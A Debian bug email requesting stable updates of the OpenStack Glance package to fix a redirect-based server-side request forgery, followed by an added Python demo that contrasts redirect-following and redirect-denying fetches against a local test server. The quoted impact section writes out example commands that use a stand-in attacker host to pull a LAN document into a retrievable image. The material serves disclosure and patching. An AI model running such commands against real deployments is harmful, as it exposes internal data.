Control: clone -1 -2
Control: retitle -1 trixie-pu: package glance/2:30.0.0-3+deb13u1
Control: retitle -2 bookworm-pu: package glance/2:25.1.0-2+deb12u2
Hi Thomas,

On Sun, Apr 05, 2026 at 05:10:51PM +0200, Thomas Goirand wrote:
> Package: release.debian.org
> Severity: normal
> Tags: trixie
> X-Debbugs-Cc: [email protected]
> Control: affects -1 + src:glance
> User: [email protected]
> Usertags: pu
>
> Hi,
>
> I would like to close this bug through p-u:
> https://bugs.debian.org/1131274
>
> [ Reason ]
> This fixes CVE-2026-34881 / OSSA-2026-004.
>
> [ Impact ]
> Before the fix, someone can trick Glance to attempt a web-download
> from a server that will do a redirect to a LAN IP address. For example,
> something like this:
>
>   openstack image import --method web-download --uri \
>     https://hacker-server.example.com/malicious-redirect \
>     my-image
>
> may redirect to an IP in the LAN of the OpenStack deployment. As a
> result, the content of the document on the LAN will be saved as a
> glance image, and can be retrieved through:
>
>   openstack image save --file stolen-document.txt my-image
>
> The proposed fix checks if the web-download URL has a redirect
> and denies the operation if that is the case.
>
> [ Tests ]
> The proposed patch includes new tests, and this has been tested
> in upstream functional CI too.
>
> [ Risks ]
> We've put this patch in production, and it worked well for us.
> I haven't tested specifically this version of Glance, but I
> believe it should be fine, thanks to unit tests.
>
> [ Checklist ]
> [x] *all* changes are documented in the d/changelog
> [x] I reviewed all changes and I approve them
> [x] attach debdiff against the package in (old)stable
> [x] the issue is verified as fixed in unstable
>
> I've attached debdiffs for both Trixie and Bookworm. Please
> allow me to upload to both p-u.
>
> Note: I attempted a backport to Bullseye and failed, as the
> code changed too much. Maybe someone from the LTS team wants
> to take over this work, but I'm giving up. As a mitigation,
> it's possible to use a web proxy for Glance that wouldn't
> give access to the LAN.
You cover here AFAICS both proposed updates, for bookworm and trixie, but please make two individual bugs, one for trixie-pu and one for bookworm-pu. I'm cloning this bug, hopefully getting the metadata right.

Can you please also include the CVE identifier in the proposed changelog?

Regards,
Salvatore
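To make the redirect problem quoted above concrete, here is an added, self-contained example (not Glance code and not part of the bug report or the proposed debdiff). A constructed local HTTP server on 127.0.0.1 plays both roles: the attacker's host answering `/malicious-redirect` with a 302, and the "LAN" host serving `/internal/secret.txt`. One client follows redirects the way a naive web-download would, so the body it stores is the redirected-to document; the other applies the check the fix describes, treating any 3xx answer as a denial. The URL paths, the `SECRET` body and the function names are assumptions for the demo; it speaks plain http only, to keep it short.

```python
"""Redirect-based fetch of a LAN resource, and the "deny any redirect" check.

Constructed for this example: a local server on 127.0.0.1 stands in for both the
attacker's redirecting host and the internal host the redirect points at.
"""
import http.client
import http.server
import threading
from urllib.parse import urlparse

SECRET = b"internal-only document\n"   # constructed stand-in for a document on the LAN


class _DemoHandler(http.server.BaseHTTPRequestHandler):
    """/malicious-redirect -> 302 to /internal/secret.txt on the same host;
    /internal/secret.txt -> 200 with SECRET; anything else -> 404."""

    def do_GET(self):
        host, port = self.server.server_address
        if self.path == "/malicious-redirect":
            self.send_response(302)
            self.send_header("Location", f"http://{host}:{port}/internal/secret.txt")
            self.send_header("Content-Length", "0")
            self.end_headers()
        elif self.path == "/internal/secret.txt":
            self.send_response(200)
            self.send_header("Content-Length", str(len(SECRET)))
            self.end_headers()
            self.wfile.write(SECRET)
        else:
            self.send_error(404)

    def log_message(self, *args):  # keep the demo quiet
        pass


class RedirectDenied(Exception):
    """Raised by the hardened client when the server tries to redirect it."""


def _single_hop(url):
    """One GET without following anything. Returns (status, Location header, body)."""
    u = urlparse(url)
    if u.scheme != "http":
        raise ValueError("this demo handles plain http only")
    conn = http.client.HTTPConnection(u.hostname, u.port, timeout=5)
    try:
        conn.request("GET", u.path or "/")
        resp = conn.getresponse()
        return resp.status, resp.getheader("Location"), resp.read()
    finally:
        conn.close()


def fetch_following_redirects(url, max_hops=5):
    """Vulnerable behaviour: transparently follow 3xx, so the stored body comes from
    wherever the first server pointed us (here, the 'internal' document)."""
    for _ in range(max_hops):
        status, location, body = _single_hop(url)
        if 300 <= status < 400 and location:
            url = location
            continue
        return body
    raise RuntimeError("too many redirects")


def fetch_denying_redirects(url):
    """Mitigated behaviour, as the quoted fix describes: a redirect aborts the
    import instead of being followed."""
    status, location, body = _single_hop(url)
    if 300 <= status < 400:
        raise RedirectDenied(f"{url} answered {status} with Location {location!r}")
    return body


def run_demo():
    """Start the constructed server, run both clients against the attacker URL,
    and return what each one did."""
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), _DemoHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    host, port = server.server_address
    attacker_url = f"http://{host}:{port}/malicious-redirect"
    results = {}
    try:
        results["vulnerable_body"] = fetch_following_redirects(attacker_url)
        try:
            fetch_denying_redirects(attacker_url)
            results["mitigated"] = "followed"
        except RedirectDenied as exc:
            results["mitigated"] = "denied"
            results["reason"] = str(exc)
    finally:
        server.shutdown()
        server.server_close()
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Run it directly and the vulnerable client returns the internal document's bytes while the hardened client reports the 302 and stores nothing, which is the behavioural difference the debdiff's new tests would be exercising.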

